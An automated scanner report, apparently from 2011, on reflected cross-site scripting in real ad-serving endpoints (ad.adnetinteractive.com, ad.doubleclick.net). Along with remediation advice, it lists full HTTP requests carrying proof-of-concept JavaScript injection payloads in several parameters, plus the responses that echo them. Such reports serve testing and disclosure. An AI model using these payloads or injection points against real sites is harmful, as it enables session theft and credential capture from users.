Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://ad.adnetinteractive.com/st [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.adnetinteractive.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd0e3"-alert(1)-"c4c905c666e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250§ion=1415802\&cd0e3"-alert(1)-"c4c905c666e=1 HTTP/1.1 Host: ad.adnetinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:03:48 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Thu, 03 Feb 2011 19:03:48 GMT Pragma: no-cache Content-Length: 4669 Age: 0 Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.adnetinteractive.com/imp?Z=300x250&cd0e3"-alert(1)-"c4c905c666e=1&s=1415802%5c&_salt=4264763177";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array(); ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5cd8"-alert(1)-"b9616ec1409 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4862 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 18:54:01 GMT Expires: Thu, 03 Feb 2011 18:54:01 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... Ghlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409https://insurance.lowermybills.com/auto/?sourceid=57808600-233911573-40497630"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 728; var winH ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe3a4"-alert(1)-"4f02e128fb4 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:53:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... Td3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; va ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5975c"-alert(1)-"1d646e7eef8 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:53:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var win ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bbf3"-alert(1)-"7f571aed142 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:53:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... mFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; var bg = ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7284c"-alert(1)-"82b821f28bc was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:53:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4870
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... X2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40567083"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9b3"-alert(1)-"8421c6bfdc2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:52:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1d3/%2a/c%3B233911573%3B0-0%3B0%3B57808600%3B3454-728/90%3B40306455/40324242/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5j ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ab7c"-alert(1)-"ad8c3af37fd was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fd HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7495 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:05:07 GMT Expires: Thu, 03 Feb 2011 16:05:07 GMT
